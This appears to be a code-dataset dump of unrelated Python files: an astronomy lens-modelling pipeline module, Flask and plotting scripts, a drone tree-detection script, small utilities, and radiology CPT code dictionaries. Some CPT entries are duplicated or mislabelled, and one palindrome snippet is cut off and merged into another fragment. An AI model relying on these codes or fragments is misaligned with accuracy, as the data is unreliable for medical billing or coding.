and mass pipelines (e.g. the previous pipelines\n are used to determine whether the source model is parametric or an inversion).\n\n The source can be returned as an instance or a model, depending on the optional input. The default SLaM p\n ipelines return parametric sources as a model (give they must be updated to properly compute a new mass model)\n and return inversions as an instance (as they have sufficient flexibility to typically not required updating).\n They use the *source_from_pevious_pipeline* method of the SLaM class to do this.\n\n The pipeline tool af.last is required to locate the previous source model, which requires an index based on the\n pipelines that have run. For example, if the source model you wish to load from is 3 phases back (perhaps\n because there were multiple phases in a Light pipeline preivously) this index should be 2.\n\n Parameters\n ----------\n source_as_model : bool\n If *True* the source is returned as a *model* where the parameters are fitted for using priors of the\n phase result it is loaded from. If *False*, it is an instance of that phase's result.\n index : integer\n The index (counting backwards from this phase) of the phase result used to setup the source.\n \"\"\"\n\n if self.hyper.hyper_galaxies:\n\n hyper_galaxy = af.PriorModel(ag.HyperGalaxy)\n\n hyper_galaxy.noise_factor = (\n af.last.hyper_combined.model.galaxies.source.hyper_galaxy.noise_factor\n )\n hyper_galaxy.contribution_factor = (\n af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy.contribution_factor\n )\n hyper_galaxy.noise_power = (\n af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy.noise_power\n )\n\n else:\n\n hyper_galaxy = None\n\n if self.source.type_tag in \"sersic\":\n\n if source_as_model:\n\n return ag.GalaxyModel(\n redshift=af.last[index].model.galaxies.source.redshift,\n sersic=af.last[index].model.galaxies.source.sersic,\n hyper_galaxy=hyper_galaxy,\n )\n\n else:\n\n return ag.GalaxyModel(\n redshift=af.last[index].instance.galaxies.source.redshift,\n sersic=af.last[index].instance.galaxies.source.sersic,\n hyper_galaxy=hyper_galaxy,\n )\n\n else:\n\n if source_as_model:\n\n return ag.GalaxyModel(\n redshift=af.last.instance.galaxies.source.redshift,\n pixelization=af.last.hyper_combined.instance.galaxies.source.pixelization,\n regularization=af.last.hyper_combined.model.galaxies.source.regularization,\n )\n\n else:\n\n return ag.GalaxyModel(\n redshift=af.last.instance.galaxies.source.redshift,\n pixelization=af.last[\n index\n ].hyper_combined.instance.galaxies.source.pixelization,\n regularization=af.last[\n index\n ].hyper_combined.instance.galaxies.source.regularization,\n hyper_galaxy=hyper_galaxy,\n )\n\n\nclass SLaMHyper(setup.SetupPipeline):\n def __init__(\n self,\n hyper_galaxies=False,\n hyper_image_sky=False,\n hyper_background_noise=False,\n hyper_fixed_after_source=False,\n hyper_galaxies_search=None,\n inversion_search=None,\n hyper_combined_search=None,\n evidence_tolerance=None,\n ):\n \"\"\"The setup of a pipeline, which controls how PyAutoLens template pipelines runs, for example controlling\n assumptions about the lens's light profile bulge-disk model or if shear is included in the mass model.\n\n Users can write their own pipelines which do not use or require the *SetupPipeline* class.\n\n This class enables pipeline tagging, whereby the setup of the pipeline is used in the template pipeline\n scripts to tag the output path of the results depending on the setup parameters. This allows one to fit\n different models to a dataset in a structured path format.\n\n Parameters\n ----------\n hyper_galaxies : bool\n If a hyper-pipeline is being used, this determines if hyper-galaxy functionality is used to scale the\n noise-map of the dataset throughout the fitting.\n hyper_image_sky : bool\n If a hyper-pipeline is being used, this determines if hyper-galaxy functionality is used include the\n image's background sky component in the model.\n hyper_background_noise : bool\n If a hyper-pipeline is being used, this determines if hyper-galaxy functionality is used include the\n noise-map's background component in the model.\n hyper_fixed_after_source : bool\n If, after the Source pipeline, the hyper parameters are fixed and thus no longer reopitmized using new\n mass models.\n \"\"\"\n\n super().__init__(\n hyper_galaxies=hyper_galaxies,\n hyper_image_sky=hyper_image_sky,\n hyper_background_noise=hyper_background_noise,\n hyper_galaxies_search=hyper_galaxies_search,\n inversion_search=inversion_search,\n hyper_combined_search=hyper_combined_search,\n evidence_tolerance=evidence_tolerance,\n )\n\n self.hyper_fixed_after_source = hyper_fixed_after_source\n\n @property\n def tag(self):\n return (\n conf.instance.tag.get(\"pipeline\", \"pipeline\", str)\n + self.hyper_tag\n + self.hyper_fixed_after_source_tag\n )\n\n @property\n def hyper_tag(self):\n \"\"\"Tag ithe hyper pipeline features used in a hyper pipeline to customize pipeline output paths.\n \"\"\"\n if not any(\n [self.hyper_galaxies, self.hyper_image_sky, self.hyper_background_noise]\n ):\n return \"\"\n\n return (\n \"__\"\n + conf.instance.tag.get(\"pipeline\", \"hyper\", str)\n + self.hyper_galaxies_tag\n + self.hyper_image_sky_tag\n + self.hyper_background_noise_tag\n + self.hyper_fixed_after_source_tag\n )\n\n @property\n def hyper_fixed_after_source_tag(self):\n \"\"\"Generate a tag for if the hyper parameters are held fixed after the source pipeline.\n\n This changes the pipeline setup tag as follows:\n\n hyper_fixed_after_source = False -> setup\n hyper_fixed_after_source = True -> setup__hyper_fixed\n \"\"\"\n if not self.hyper_fixed_after_source:\n return \"\"\n elif self.hyper_fixed_after_source:\n return \"_\" + conf.instance.tag.get(\n \"pipeline\", \"hyper_fixed_after_source\", str\n )\n\n\nclass SLaMSource(setup.SetupPipeline):\n def __init__(\n self,\n pixelization=None,\n regularization=None,\n inversion_pixels_fixed=None,\n no_shear=False,\n lens_light_centre=None,\n lens_mass_centre=None,\n align_light_mass_centre=False,\n lens_light_bulge_only=False,\n number_of_gaussians=None,\n ):\n\n super().__init__(\n pixelization=pixelization,\n regularization=regularization,\n inversion_pixels_fixed=inversion_pixels_fixed,\n no_shear=no_shear,\n lens_light_centre=lens_light_centre,\n lens_mass_centre=lens_mass_centre,\n number_of_gaussians=number_of_gaussians,\n align_light_mass_centre=align_light_mass_centre,\n )\n\n self.lens_light_bulge_only = lens_light_bulge_only\n self.type_tag = None\n\n @property\n def tag(self):\n return (\n conf.instance.tag.get(\"pipeline\", \"source\", str)\n + \"__\"\n + self.type_tag\n + self.number_of_gaussians_tag\n + self.no_shear_tag\n + self.lens_light_centre_tag\n + self.lens_mass_centre_tag\n + self.align_light_mass_centre_tag\n + self.lens_light_bulge_only_tag\n )\n\n @property\n def lens_light_bulge_only_tag(self):\n \"\"\"Generate a tag for if the lens light of the pipeline and / or phase are fixed to a previous estimate, or\n varied during he analysis, to customize phase names.\n\n This changes the setup folder as follows:\n\n fix_lens_light = False -> setup__\n fix_lens_light = True -> setup___fix_lens_light\n \"\"\"\n if not self.lens_light_bulge_only:\n return \"\"\n elif self.lens_light_bulge_only:\n return \"__\" + conf.instance.tag.get(\"pipeline\", \"bulge_only\", str)\n\n @property\n def shear(self):\n \"\"\"For a SLaM source pipeline, determine the shear model from the no_shear setting.\"\"\"\n if not self.no_shear:\n return ag.mp.ExternalShear\n\n @property\n def is_inversion(self):\n \"\"\"Returns True is the source is an inversion, meaning this SLaM analysis has gone through a source\n inversion pipeline.\"\"\"\n if self.type_tag in \"sersic\":\n return False\n else:\n return True\n\n def align_centre_of_mass_to_light(self, mass, light_centre):\n \"\"\"Align the centre of a mass profile to the centre of a light profile, if the align_light_mass_centre\n SLaM setting is True.\n \n Parameters\n ----------\n mass : ag.mp.MassProfile\n The mass profile whose centre may be aligned with the lens_light_centre attribute.\n light : (float, float)\n The centre of the light profile the mass profile is aligned with.\n \"\"\"\n if self.align_light_mass_centre:\n mass.centre = light_centre\n else:\n mass.centre.centre_0 = af.GaussianPrior(mean=light_centre[0], sigma=0.1)\n mass.centre.centre_1 = af.GaussianPrior(mean=light_centre[1], sigma=0.1)\n return mass\n\n def align_centre_to_lens_light_centre(self, light):\n \"\"\"\n Align the centre of an input light profile to the lens_light_centre of this instance of the SLaM Source\n class, make the centre of the light profile fixed and thus not free parameters that are fitted for.\n\n If the lens_light_centre is not input (and thus None) the light profile centre is unchanged.\n\n Parameters\n ----------\n light : ag.mp.MassProfile\n The light profile whose centre may be aligned with the lens_light_centre attribute.\n \"\"\"\n if self.lens_light_centre is not None:\n light.centre = self.lens_light_centre\n return light\n\n def align_centre_to_lens_mass_centre(self, mass):\n \"\"\"\n Align the centre of an input mass profile to the lens_mass_centre of this instance of the SLaM Source\n class, make the centre of the mass profile fixed and thus not free parameters that are fitted for.\n\n If the lens_mass_centre is not input (and thus None) the mass profile centre is unchanged.\n\n Parameters\n ----------\n mass : ag.mp.MassProfile\n The mass profile whose centre may be aligned with the lens_mass_centre attribute.\n \"\"\"\n if self.lens_mass_centre is not None:\n mass.centre = self.lens_mass_centre\n return mass\n\n def remove_disk_from_lens_galaxy(self, lens):\n \"\"\"Remove the disk from a GalaxyModel, if the SLaM settings specify to mooel the lens's light as bulge-only.\"\"\"\n if self.lens_light_bulge_only:\n lens.disk = None\n return lens\n\n def unfix_lens_mass_centre(self, mass):\n \"\"\"If the centre of a mass model was previously fixed to an input value (e.g. lens_mass_centre), unaligned it\n by making its centre GaussianPriors.\n \"\"\"\n\n if self.lens_mass_centre is not None:\n\n mass.centre.centre_0 = af.GaussianPrior(\n mean=self.lens_mass_centre[0], sigma=0.05\n )\n mass.centre.centre_1 = af.GaussianPrior(\n mean=self.lens_mass_centre[1], sigma=0.05\n )\n\n else:\n\n mass.centre.centre_0 = af.last[-1].model.galaxies.lens.mass.centre.centre_0\n mass.centre.centre_1 = af.last[-1].model.galaxies.lens.mass.centre.centre_1\n\n return mass\n\n def unalign_lens_mass_centre_from_light_centre(self, mass):\n \"\"\"If the centre of a mass model was previously aligned with that of the lens light centre, unaligned them\n by using an earlier model of the light.\n \"\"\"\n if self.align_light_mass_centre:\n\n mass.centre = af.last[-3].model.galaxies.lens.bulge.centre\n\n else:\n\n mass.centre = af.last[-1].model.galaxies.lens.mass.centre\n\n return mass\n\n\nclass SLaMLight(setup.SetupPipeline):\n def __init__(\n self,\n align_bulge_disk_centre=False,\n align_bulge_disk_elliptical_comps=False,\n disk_as_sersic=False,\n number_of_gaussians=None,\n ):\n\n super().__init__(\n align_bulge_disk_centre=align_bulge_disk_centre,\n align_bulge_disk_elliptical_comps=align_bulge_disk_elliptical_comps,\n disk_as_sersic=disk_as_sersic,\n number_of_gaussians=number_of_gaussians,\n )\n\n self.type_tag = None\n\n @property\n def tag(self):\n if self.number_of_gaussians is None:\n return (\n conf.instance.tag.get(\"pipeline\", \"light\", str)\n + \"__\"\n + self.type_tag\n + self.align_bulge_disk_tag\n + self.disk_as_sersic_tag\n )\n else:\n return (\n conf.instance.tag.get(\"pipeline\", \"light\", str)\n + \"__\"\n + self.type_tag\n + self.number_of_gaussians_tag\n )\n\n\nclass SLaMMass(setup.SetupPipeline):\n def __init__(\n self,\n no_shear=False,\n fix_lens_light=False,\n constant_mass_to_light_ratio=False,\n bulge_mass_to_light_ratio_gradient=False,\n disk_mass_to_light_ratio_gradient=False,\n align_light_dark_centre=False,\n align_bulge_dark_centre=False,\n include_smbh=False,\n smbh_centre_fixed=True,\n ):\n\n super().__init__(\n no_shear=no_shear,\n constant_mass_to_light_ratio=constant_mass_to_light_ratio,\n bulge_mass_to_light_ratio_gradient=bulge_mass_to_light_ratio_gradient,\n disk_mass_to_light_ratio_gradient=disk_mass_to_light_ratio_gradient,\n align_light_dark_centre=align_light_dark_centre,\n align_bulge_dark_centre=align_bulge_dark_centre,\n include_smbh=include_smbh,\n smbh_centre_fixed=smbh_centre_fixed,\n )\n\n self.disk_as_sersic = None\n self.fix_lens_light = fix_lens_light\n self.type_tag = None\n\n @property\n def tag(self):\n return (\n conf.instance.tag.get(\"pipeline\", \"mass\", str)\n + \"__\"\n + self.type_tag\n + self.no_shear_tag\n + self.align_light_dark_centre_tag\n + self.align_bulge_dark_centre_tag\n + self.include_smbh_tag\n + self.fix_lens_light_tag\n )\n\n @property\n def fix_lens_light_tag(self):\n \"\"\"Generate a tag for if the lens light of the pipeline and / or phase are fixed to a previous estimate,\n or varied during he analysis, to customize phase names.\n\n This changes the setup folder as follows:\n\n fix_lens_light = False -> setup__\n fix_lens_light = True -> setup___fix_lens_light\n \"\"\"\n if not self.fix_lens_light:\n return \"\"\n elif self.fix_lens_light:\n return \"__\" + conf.instance.tag.get(\"pipeline\", \"fix_lens_light\", str)\n\n @property\n def shear_from_previous_pipeline(self):\n \"\"\"Return the shear _PriorModel_ from a previous pipeline, where:\n\n 1) If the shear was included in the *Source* pipeline and *no_shear* is *False* in the *Mass* object, it is\n returned using this pipeline result as a model.\n 2) If the shear was not included in the *Source* pipeline and *no_shear* is *False* in the *Mass* object, it is\n returned as a new *ExternalShear* PriorModel.\n 3) If *no_shear* is *True* in the *Mass* object, it is returned as None and omitted from the lens model.\n \"\"\"\n if not self.no_shear:\n if af.last.model.galaxies.lens.shear is not None:\n return af.last.model.galaxies.lens.shear\n else:\n return ag.mp.ExternalShear\n else:\n return None\n","sub_path":"autolens/pipeline/slam.py","file_name":"slam.py","file_ext":"py","file_size_in_byte":22027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"534582035","text":"from flask import *\nimport os\n\n\napp=Flask(__name__,template_folder='templates')\n\n\n@app.route('/')\ndef upload():\n return render_template(\"annotator.html\")\n\n@app.route('/demo')\ndef demo():\n return render_template(\"dragdemo.html\")\n\n@app.route('/save', methods=[\"POST\", \"GET\"])\ndef save_json():\n # POST request\n if request.method == 'POST':\n print('Incoming..')\n print(request.get_json()[\"data\"]) # parse as JSON\n data = request.get_json()[\"data\"]\n print(\"os.getcwd(): \", os.getcwd())\n\n annotationpath = 'static/json/annotations.json'\n\n print(os.path.exists(annotationpath))\n\n try:\n os.remove(annotationpath)\n except Exception as e:\n print(\"An exception occurred: \", e)\n\n with open(annotationpath, 'a') as f:\n f.write(data + '\\n')\n\n return 'OK', 200\n\n# @app.route('/getjson', methods=[\"POST\", \"GET\"])\n# def get_json():\n# return 'OK', 200\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454381315","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndata = np.loadtxt('10-memory.txt')\n\nplt.subplot(211) # the first subplot in the first figure\nplt.title('System with one Windows vm')\t\t# set the figure title\nplt.plot(data[:,0], 'r-')\nplt.xlabel('Times (min)')\nplt.ylabel('Memory Consumption (MB)')\nplt.axis([0, 120, 450, 750])\nplt.grid(True)\n\nplt.subplot(212) # the second subplot\nplt.plot(data[:,1], 'b-')\nplt.xlabel('Times (min)')\nplt.ylabel('Memory Utilization (%)')\nplt.axis([0, 120, 20.0, 50.0])\nplt.grid(True)\n\n\nplt.show()\n","sub_path":"matplotlib/10/memory-consumption.py","file_name":"memory-consumption.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"348654274","text":"import cv2\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom matplotlib import pyplot as plt\ndef getTrees(img):#获得树桩中心的坐标\n HSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n H, S, V = cv2.split(HSV)\n Lower = np.array([15, 7, 180])\n Upper = np.array([20, 22, 215])#柱子\n mask = cv2.inRange(HSV, Lower, Upper)\n points = cv2.bitwise_and(img, img, mask=mask)\n points_gray = cv2.cvtColor(points,cv2.COLOR_BGR2GRAY)\n # 侵蚀���稀释,去噪,因为黑白反转故侵蚀与稀释反转\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n points_gray = cv2.dilate(points_gray, kernel, iterations=1)\n points_gray = cv2.erode(points_gray, kernel, iterations=4)\n points_gray = cv2.dilate(points_gray, kernel, iterations=3)\n re,points1=cv2.threshold(points_gray,50,255,cv2.THRESH_BINARY_INV)#points1为二值图像 (points1[x][y] x不超过480 y不超过940)\n #x轴正半轴为下,y轴正半轴为右\n #cv2.imshow('1',points1)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n height = points1.shape[0]#480\n width = points1.shape[1]#640\n dot= []\n\n for raw in range(height):\n for col in range(width):\n if(points1[raw][col]==0):#黑色的是柱子\n #print(' x = '+str(raw)+' y = '+str(col))\n dot.append([raw,col])#黑色点的图像\n dot=np.array(dot)#shape (2872,2)\n #print(dot)\n x=dot[:,1]#横坐标 最大640\n y=dot[:,0]#纵坐标 最大480\n y=480-y\n #plt.scatter(x,y)#打印所有点的位置\n #plt.show()\n dot=np.array(dot)\n\n estimator = KMeans(n_clusters=15)#构造聚类器\n estimator.fit(dot)#聚类\n label_pred = estimator.labels_ #获取聚类标签\n centroids = estimator.cluster_centers_ #获取聚类中心\n inertia = estimator.inertia_ # 获取聚类准则的总和\n centroids[:,0]=480-centroids[:,0]\n #print(centroids)\n centroids=centroids[np.lexsort(centroids[:,:-1].T)]\n x_cen=centroids[:,1]\n y_cen=centroids[:,0]\n #y=480-y\n plt.scatter(x_cen,y_cen)\n plt.show()\n\n return centroids\n\nimg=cv2.imread('/Users/tongbohan/Desktop/images/img_3_0_1562030342490023600.png')\n#print(getTrees(img))\na = getTrees(img)\na[[0, 1], :] = a[[1, 0], :] # 实现了第i行与第j行的互换\n#print(a)\npath = a/100\n#print(path)\ndef flyByVector(vector):#传入一个移动向量\n x = vector[0]\n y = vector[1]\n if x>0:#如果大于0向前或者向右\n uav.flyCmd('forward','fast')\n time.sleep(x)\n #这里的sleep参数不确定,需要测试得到结果,即移动的时间和像素之间的关系\n elif x<0:\n uav.flyCmd('backward','fast')\n time.sleep(-x)\n else:uav.flyCmd('stop')\n\n if y>0:\n uav.flyCmd('moveright','fast')\n time.sleep(y)\n #这里的sleep参数不确定\n elif y<0:\n uav.flyCmd('moveleft','fast')\n time.sleep(-y)\n else:uav.flyCmd('stop')\n\n\nfor num in range(path.shape[0]):\n print('now going to tree : '+str(num+1))\n flyByVector(path[num])\n","sub_path":"app/vision/scratch_2.py","file_name":"scratch_2.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515543922","text":"# Given a string, considering only alphanumeric chars and ignoring cases, check if string is palindrome \n\nimport string \n\n# Better Solution b/c only requires linear time, and not linear space\ndef is_palindrome(s):\n # Iterator i will move from front to back \n # Iterator j will move from back to from \n i = 0 # start of string \n j = len(s) -1 # start at back of string\n\n while i < j:\n while not s[i].isalnum() and i 1000:\n return True\n else:\n return False\n","sub_path":"Python/PythonC++Scala/script/tag/dfhspider/wangwang.py","file_name":"wangwang.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158586562","text":"import datetime\nimport time\nfrom functools import wraps\nfrom wsgiref.handlers import format_date_time\nfrom flask import make_response\n\n\ndef cache(expires=None, round_to_minute=False):\n \"\"\"\n Add Flask cache response headers based on expires in seconds.\n \n If expires is None, caching will be disabled.\n Otherwise, caching headers are set to expire in now + expires seconds\n\n If round_to_minute is True, then it will always expire at the start of a minute (seconds = 0)\n \n Example usage:\n \n @app.route('/map')\n @cache(expires=60)\n def index():\n return render_template('index.html')\n \n \"\"\"\n def cache_decorator(view):\n @wraps(view)\n def cache_func(*args, **kwargs):\n now = datetime.datetime.now()\n \n response = make_response(view(*args, **kwargs))\n response.headers['Last-Modified'] = format_date_time(time.mktime(now.timetuple()))\n \n if expires is None:\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0'\n response.headers['Expires'] = '-1'\n else:\n expires_time = now + datetime.timedelta(seconds=expires)\n\n if round_to_minute:\n expires_time = expires_time.replace(second=0, microsecond=0)\n\n response.headers['Cache-Control'] = 'public'\n response.headers['Expires'] = format_date_time(time.mktime(expires_time.timetuple()))\n \n return response\n return cache_func\n return cache_decorator","sub_path":"all-gists/954da3acec84606885f5/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222657786","text":"import os\n\n\ndef get_current_path(current_file):\n return os.path.abspath(os.path.dirname(current_file))\n\n\nfrom math import radians, cos, sin, asin, sqrt\n\n\ndef calculate_distance(lhs_longitude, lhs_latitude, rhs_longitude, rhs_latitude): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n \"\"\"\n # 将十进制度数转化为弧度\n lhs_longitude, lhs_latitude, rhs_longitude, rhs_latitude = \\\n map(radians, [lhs_longitude, lhs_latitude, rhs_longitude, rhs_latitude])\n\n # haversine公式\n dlon = rhs_longitude - lhs_longitude\n dlat = rhs_latitude - lhs_latitude\n a = sin(dlat / 2) ** 2 + cos(lhs_latitude) * cos(rhs_latitude) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000\n","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52043881","text":"#\n## sam_2018_cpt_rad library module\n## Description: Contains dictionaries of 2018 CPT codes and descriptions for radiology modalities and search functions.\n## These codes were taken from \"http://www.mainstreetradiology.com/common/pages/UserFile.aspx%3FfileId%3D895629\"\n## The CPT codes are for the following modalities; CT, FLUORO, MAMMO, MRI, NUCLEAR, PET, US, XRAY \n## Disclaimer: I noticed typos in some of the definitions for s few of the CPT codes but intentionally did not correct them\n##\n## v1.0 sdomingo 2019 .Inital version\n#\n## Dictionary names are; RAD_CPT_CT_dict, RAD_CPT_FLUORO_dict, RAD_CPT_MAMO_dict, RAD_CPT_MRI_dict, \n## RAD_CPT_NUCLEAR_dict, RAD_CPT_PET_dict, RAD_CPT_US_dict, RAD_CPT_XRAY_dict, \n## CT Dictionary\nRAD_CPT_CT_dict = { '70450': 'CT BRAIN without contrast', \n '70460': 'CT BRAIN with contrast', \n '70470': 'CT BRAIN w/o & with contrast',\n '70480': 'CT ORBIT/SKULL without contrast',\n '70481': 'CT ORBITS/SKULL with contrast',\n '70482': 'CT ORBIT/SKULL w/o & with contrast',\n '70486': 'CT MAXILLOFACIAL without contrast',\n '70488': 'CT FACE w/o & with contrast',\n '70490': 'CT NECK SOFT TISSUE without contrast',\n '70491': 'CT NECT SOFT TISSUE with contrast',\n '70492': 'CT NECK SOFT TISSUE w/o & with contrast',\n '70496': 'CT ANGIO HEAD with and/or w/o contrast',\n '70498': 'CT ANGIO/NECK with and/or w/o contrast',\n '71250': 'CT CHEST without contrast',\n '71260': 'CT CHEST with contrast',\n '71270': 'CT CHEST w/o & with contrast',\n '71275': 'CT ANGIOGRAPHY/CHEST with and/or w/o contrast',\n '72125': 'CT CERVICAL SPINE without contrast',\n '72126': 'CT CERVICAL SPINE with contrast',\n '72127': 'CT CERVICAL SPINE w/o & with contrast',\n '72128': 'CT THORACIC SPINE without contrast',\n '72129': 'CT THORACIC SPINE with contrast',\n '72130': 'CT THORACIC SPINE w/o & with contrast',\n '72131': 'CT LUMBAR SPINE without contrast',\n '72132': 'CT LUMBAR SPINE with contrast',\n '72133': 'CT LUMBAR SPINE w/o & with contrast',\n '72191': 'CT ANGIO PELVIS with and/or w/o contrast',\n '72192': 'CT PELVIS without contrast',\n '72193': 'CT PELVIS with contrast',\n '72194': 'CT PELVIS w/o & with contrast',\n '73200': 'CT UPPER EXTREMITY without contrast',\n '73201': 'CT UPPER EXTREMITY with contrast',\n '73202': 'CT UPPER EXTREMITY w/o & with contrast',\n '73206': 'CT ANGIO UPPER EXTREM with and/or w/o contrast',\n '73700': 'CT LOWER EXTREMITY without contrast',\n '73701': 'CT LOWER EXTREMITY with contrast',\n '73702': 'CT LOWER EXTREMITY w/o & with contrast',\n '73706': 'CT ANGIO LOWER EXT with and/or w/o contrast',\n '74150': 'CT ABDOMEN w/o contrast',\n '74160': 'CT ABDOMEN with contrast',\n '74170': 'CT ABDOMEN w/o & with contrast',\n '74174': 'CT ANGIO ABD & PELVIS contrast with & w/o contrast',\n '74175': 'CT ANGIO ABD with contrast/noncontrast',\n '74176': 'CT ABDOMEN & PELVIS w/o contrast',\n '74177': 'CT ABDOMEN & PELVIS with contrast',\n '74178': 'CT ABDOMEN & PELVIS w/o contrast 1/>body re',\n '74261': 'CT ABDOMEN w/o contrast',\n '74262': 'CT ABDOMEN w/o contrast',\n '74263': 'CT ABDOMEN w/o contrast',\n '73636': 'CT BRAIN w/o contrast',\n '73731': 'CT BRAIN with contrast',\n '73827': 'CT BRAIN w/o & with contrast',\n '73922': 'CT ORBIT/SKULL without contrast',\n '74018': 'CT ORBITS/SKULL with contrast',\n '74113': 'CT ORBIT/SKULL w/o & with contrast',\n '74209': 'CT MAXILLOFACIAL without contrast',\n '74304': 'CT FACE with contrast',\n '74400': 'CT FACE w/o & with contrast',\n '74495': 'CT NECK SOFT TISSUE without contrast',\n '74591': 'CT NECT SOFT TISSUE with contrast'}\n## FLUORO Dictionary\nRAD_CPT_FLUORO_dict = { '74210': 'FLUORO Upper Esophagram',\n '74220': 'FLUORO ESOPHAGUS EXAM',\n '74241': 'FLUORO UPPER GI SERIES',\n '74247': 'FLUORO UPPER GI TRACT WITH AIR',\n '74249': 'FLUORO UGI & SB WITH AIR',\n '74250': 'FLUORO SMALL BOWEL SERIES',\n '74270': 'FLUORO BARIUM ENEMA',\n '74280': 'FLUORO BARIUM ENEMA W/AIR CONT',\n '74400': 'FLUORO IVP'}\n## MAMMO Dictionary\nRAD_CPT_MAMO_dict = {'77063': 'MAMMOGRAPHY 3D DIGITAL SCREENING', \n '77065': 'MAMMOGRAPHY-Diagnostic UNILATERAL',\n '77066': 'MAMMOGRAPHY-Diagnostic- BILATERAL',\n '77067': 'MAMMOGRAPHY SCREENING'}\n## MRI Dictionary\nRAD_CPT_MRI_dict = {'70336': 'MRI TEMPOROMANDIBULAR JOI', \n '70540': 'MRI SOFT TISSUE NECK,ORBIT without contrast',\n '70542': 'MRI SOFT TISSUE NECK,ORBIT with contrast',\n '70543': 'MRI NECK,ORBIT w/o & with contrast',\n '70544': 'MRA HEAD without contrast',\n '70545': 'MRA HEAD with contrast',\n '70546': 'MRA HEAD w/o & with contrast',\n '70547': 'MRA NECK without contrast',\n '70548': 'MRA NECK/CAROTID with contrast',\n '70549': 'MRA/NECK w/o & with contrast',\n '70551': 'MRI BRAIN without contrast',\n '70552': 'MRI BRAIN with contrast',\n '70553': 'MRI BRAIN w/o & with contrast',\n '71550': 'MRI CHEST without contrast',\n '71551': 'MRI CHEST with contrast',\n '71552': 'MRI CHEST w/o & with contrast',\n '71555': 'MRA CHEST',\n '72141': 'MRI CERV.SPINE without contrast',\n '72142': 'MRI CERV SPINE with contrast',\n '72146': 'MRI THORACIC without contrast',\n '72147': 'MRI THORACIC with contrast',\n '72148': 'MRI LUMBAR SPINE without contrast / MRI LUMBAR PLEXUS',\n '72149': 'MRI LUMBAR SPINE with contrast',\n '72156': 'MRI/CERV SPINE w/o & with contrast',\n '72157': 'MRI THORACIC w/o & with contrast',\n '72158': 'MRI LUMBAR SPINE w/o & with contrast',\n '72159': 'MRI SPINE Angiography',\n '72195': 'MRI PELVIS without contrast',\n '72196': 'MRI PELVIS with contrast',\n '72197': 'MRI PELVIS w/o & with contrast',\n '72198': 'MRA PELVIS',\n '73218': 'MRI UPPER EXT. NON JOINT without contrast',\n '72197': 'MRI PELVIS w/o & with contrast',\n '72198': 'MRA PELVIS',\n '73218': 'MRI UPPER EXT. NON JOINT without contrast',\n '73219': 'MRI UPPER EXT. NON JOINT with contrast',\n '73220': 'MRI UPPER EXT NON JOINT w/o & with contrast',\n '73221': 'MRI UPPER EXT. JOINT without contrast',\n '73222': 'MRI UPPER EXT JOINT with contrast',\n '73223': 'MRI UPPER JOINT w/o & with contrast',\n '73225': 'MRA UPPER EXTREMITY',\n '73718': 'MRI LOWER EXT without contrast',\n '73719': 'MRI LOWER EXT with contrast',\n '73720': 'MRI LOWER EX. w/o & with contrast',\n '73721': 'MRI LOWER EXT JOINT without contrast',\n '73722': 'MRI LOWER EXT JOINT with contrast',\n '73723': 'MRI/JOINT LOW EXTREMITY w/o & with contrast',\n '73725': 'MRA.ANGIO,LOWER EXTREMITY',\n '74181': 'MRI ABDOMEN without contrast',\n '74182': 'MRI/ABDOMEN with contrast',\n '74183': 'MRI ABD. w/o & with contr',\n '74185': 'MRA ABDOMEN',\n '77058': 'MRI BREAST UNILATERAL',\n '77059': 'MRI BREAST BILATERAL'}\n## NUCLEAR Dictionary\nRAD_CPT_NUCLEAR_dict = {'78012':'NUCLEAR EXAM THYROID (UPTAKE only)', \n '78012':'NUCLEAR EXAM THYROID (UPTAKE only)',\n '78014':'NUCLEAR EXAM THYROID (WITH UPTAKE)',\n '78013':'NUCLEAR EXAM THYROID (WITH IMAGING ONLY)',\n '78070':'NUCLEAR EXAM PARATHYROID SCAN',\n '78071':'NUCLEAR EXAM PARATHYROID SCAN with SPECT',\n '78206':'NUCLEAR LIVER SCAN SPECT(HEMANGIOMA)',\n '78215':'NUCLEAR LIVER/SPLEEN SCAN static',\n '78226':'NUCLEAR HEPATOBILIARY SCAN',\n '78227':'NUCLEAR HEPATOBILIARY SCAN WITH PHARM',\n '78290':'NUCLEAR MECKELS SCAN',\n '78306':'NUCLEAR BONE SCAN WHOLE BODY',\n '78315':'NUCLEAR BONE SCAN 3 PHASE',\n '78320':'NUCLEAR BONE SCAN SPECT',\n '78452':'MyoCardial Perfusion Imaging/Exercise with 93015',\n '78452':'MyoCardial Perfusion Imaging/Pharmacologic with 93015',\n '78472':'NUCLEAR MUGA SCAN CARDIA IMAGING',\n '78607':'NUCLEAR Brain Spect (DaTscan)',\n '78707':'NUCLEAR RENAL SCAN WITH MAG 3',\n '78708':'NUCLEAR RENAL SCAN WITH LASIX OR 